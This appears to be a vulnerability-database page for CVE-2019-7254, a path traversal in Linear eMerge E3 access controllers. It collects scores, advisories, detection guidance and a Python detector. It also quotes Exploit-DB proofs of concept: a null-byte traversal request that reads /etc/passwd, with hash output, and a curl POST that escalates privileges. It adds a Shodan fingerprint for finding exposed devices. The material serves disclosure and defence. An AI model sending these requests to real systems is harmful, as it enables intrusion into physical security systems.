CVE-2019-7254
Published 2019-07-02
CVE-2019-7254: Linear eMerge E3-Series devices allow File Inclusion.
Priority P1 · 81 · high · 7.5 (CVSS 3.1)
AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:N / A:N
ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 82.04% (99.6th percentile)
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| nortekcontrol | linear_emerge_elite_firmware | <= 1.00-06 | — |
| nortekcontrol | linear_emerge_essential_firmware | <= 1.00-06 | — |
Detection & IOCs (extracted from sources)
- Detect unauthenticated LFI via the `c` parameter using null-byte termination (%00) in GET requests to the root path of eMerge E3 devices.
- Detect LFI attempts via the `tpl` parameter in badge_print_v0.php and badge_template_print.php, and via the `layout` parameter in badge_template_v0.php.
- Shodan/FOFA fingerprint for exposed eMerge E3 devices: search for HTTP title containing 'emerge'.
- Privilege escalation abuse: unauthenticated or low-privilege POST to /?c=webuser&m=update with UserRole=1 to elevate account privileges.
- Successful LFI exploitation can be confirmed by matching the regex `root:.*:0:0:` in HTTP 200 responses from the device.
- The null-byte termination (%00) in the `c` parameter traversal path is specific to version 1.00-06 and may not work on patched or newer firmware versions.
- The exploit was tested on firmware version 1.00-06 only; behavior on other versions is unconfirmed.
- The privilege escalation PoC (CVE-2019-7259) reuses the same session cookie format; detections relying solely on PHPSESSID may produce false positives for legitimate sessions.
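The request and response checks in the list above, as an added Python example (not part of the original page or of any vendor tooling). Function names, finding labels and sample inputs are assumptions made here; the response signature is deliberately looser than `root:.*:0:0:` because the PoC output quoted on this page shows gid 100 for root.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Badge scripts and the parameter each one takes, as listed above.
BADGE_PARAMS = {"badge_print_v0.php": "tpl",
                "badge_template_print.php": "tpl",
                "badge_template_v0.php": "layout"}

# Looser than `root:.*:0:0:`: the passwd line in this page's PoC output has
# gid 100, so any numeric gid is accepted after uid 0.
PASSWD_RE = re.compile(r"^root:[^:\n]*:0:\d+:", re.M)


def _traversal(value):
    """True if a query value (already decoded once) walks up or hides a NUL."""
    value = unquote(value).replace("\\", "/")  # second decode: double encoding
    return "../" in value or "\x00" in value


def classify(method, target, body=""):
    """Return finding labels for one request (method, request target, body)."""
    parts = urlsplit(target)
    query = parse_qs(parts.query, keep_blank_values=True)
    findings = []
    if parts.path in ("", "/") and any(map(_traversal, query.get("c", []))):
        findings.append("lfi-c-param")
    param = BADGE_PARAMS.get(parts.path.rsplit("/", 1)[-1])
    if param and any(map(_traversal, query.get(param, []))):
        findings.append("lfi-badge-" + param)
    if (method == "POST" and query.get("c") == ["webuser"]
            and query.get("m") == ["update"]
            and parse_qs(body).get("UserRole") == ["1"]):
        findings.append("webuser-role-elevation")
    return findings


def passwd_leak(response_body):
    """True if a response body looks like it contains the root passwd entry."""
    return bool(PASSWD_RE.search(response_body))


if __name__ == "__main__":
    # Constructed samples modelled on the requests quoted on this page;
    # the m=list request is a hypothetical benign one.
    print(classify("GET", "/?c=../../../../../../etc/passwd%00"))
    print(classify("POST", "/?c=webuser&m=update", "ID=test&UserRole=1"))
    print(classify("GET", "/?c=webuser&m=list"))
    print(passwd_leak("root:x:0:100:root:/root:/bin/sh\nbin:x:1:1:bin:/bin:\n"))
```

The role-change check needs the POST body, which standard access logs do not record, so feed it from a proxy or WAF that captures bodies. It also fires on legitimate administrator edits and should be correlated with the source address and session.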
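CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 7.5 | HIGH | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |
| nvd | v2.0 | 5.0 | MEDIUM | AV:N/AC:L/Au:N/C:P/I:N/A:N |
| vulncheck | — | 7.5 | HIGH | — |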
GHSA
GHSA-j85c-g589-f83h: Linear eMerge E3-Series devices allow File Inclusion
ghsa_unreviewed·2022-05-24
CVE-2019-7254 [HIGH] CWE-22 GHSA-j85c-g589-f83h: Linear eMerge E3-Series devices allow File Inclusion
VulnCheck
nortekcontrol linear_emerge_essential_firmware Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
vulncheck·2019·CVSS 7.5
CVE-2019-7254 [HIGH] nortekcontrol linear_emerge_essential_firmware Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Affected: nortekcontrol linear_emerge_essential_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-13&host_type=src&vulnerability=cve-2019-7254; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-14&host_type=src&vulnerability=cve-2019-7254; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-17&host_type=src&vulnerabili
CISA ICS
Nice Linear eMerge E3-Series
cisa_ics·2024-03-05·CVSS 9.8
[CRITICAL] Nice Linear eMerge E3-Series
ICS Advisory
## Nice Linear eMerge E3-Series
Release Date: March 05, 2024
Alert Code: ICSA-24-065-01
## 1. EXECUTIVE SUMMARY
- CVSS v3 10.0
- ATTENTION: Exploitable remotely/low attack complexity/public exploits are available
- Vendor: Nice
- Equipment: Linear eMerge E3-Series
- Vulnerabilities: Path traversal, Cross-site scripting, OS command injection, Unrestricted Upload of File with Dangerous Type, Incorrect Authorization, Exposure of Sensitive Information to an Authorized Actor, Insufficiently Protected Credentials, Use of Hard-coded Credentials, Cross-site Request Forgery, Out-of-bounds Write
## 2. RISK EVALUATION
Successful exploitation of these vulnerabilities could allow a remote attacker to gain full system access.
## 3. TECHNICAL DETAILS
No detection rules found.
Exploit-DB
eMerge E3 1.00-06 - Unauthenticated Directory Traversal
exploitdb·2019-11-12·CVSS 7.5
CVE-2019-7254 [HIGH] eMerge E3 1.00-06 - Unauthenticated Directory Traversal
---
```
# Exploit Title: eMerge E3 1.00-06 - Unauthenticated Directory Traversal
# Google Dork: NA
# Date: 2018-09-11
# Exploit Author: LiquidWorm
# Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/
# Software Link: http://linear-solutions.com/nsc_family/e3-series/
# Version: 1.00-06
# Tested on: NA
# CVE : CVE-2019-7254
# Advisory: https://applied-risk.com/resources/ar-2019-009
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# Advisory: https://applied-risk.com/resources/ar-2019-005
# PoC
GET /?c=../../../../../../etc/passwd%00
Host: 192.168.1.2

root:$1$VVtYRWvv$gyIQsOnvSv53KQwzEfZpJ0:0:100:root:/root:/bin/sh
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:
```
Exploit-DB
eMerge E3 1.00-06 - Privilege Escalation
exploitdb·2019-11-12·CVSS 7.5
CVE-2019-7254 [HIGH] eMerge E3 1.00-06 - Privilege Escalation
---
```
# Exploit Title: eMerge E3 1.00-06 - Privilege Escalation
# Google Dork: NA
# Date: 2018-09-11
# Exploit Author: LiquidWorm
# Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/
# Software Link: http://linear-solutions.com/nsc_family/e3-series/
# Version: 1.00-06
# Tested on: NA
# CVE : CVE-2019-7254, CVE-2019-7259
# Advisory: https://applied-risk.com/resources/ar-2019-009
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# Advisory: https://applied-risk.com/resources/ar-2019-005
# PoC
# Escalate:
curl "http://192.168.1.2/?c=webuser&m=update" -X POST --data "No=3&ID=test&Password=test&Name=test&UserRole=1&Language=en&DefaultPage=sitemap&DefaultFloorNo=1&DefaultFloorState=1&AutoDisconnectTime=24"
```
Nuclei
eMerge E3 1.00-06 - Local File Inclusion
nuclei·CVSS 7.5
CVE-2019-7254 [HIGH] eMerge E3 1.00-06 - Local File Inclusion
Linear eMerge E3-Series devices are vulnerable to local file inclusion.
Template:
```yaml
id: CVE-2019-7254
info:
  name: eMerge E3 1.00-06 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: Linear eMerge E3-Series devices are vulnerable to local file inclusion.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, and potential compromise of the affected system.
  remediation: |
    Apply the latest security patch or update to a non-vulnerable version of eMerge E3.
  reference:
    - https://www.exploit-db.com/exploits/47616
    - https://applied-risk.com/labs/advisories
    - https://www.applied-risk.com/resources/ar-2019-005
    - http://packetstormsecurity.com/files/155252/Lin
```
- http://packetstormsecurity.com/files/155252/Linear-eMerge-E3-1.00-06-Directory-Traversal.html
- https://applied-risk.com/labs/advisories
- https://www.applied-risk.com/resources/ar-2019-005
2019-07-02
Published
Exploited in the wild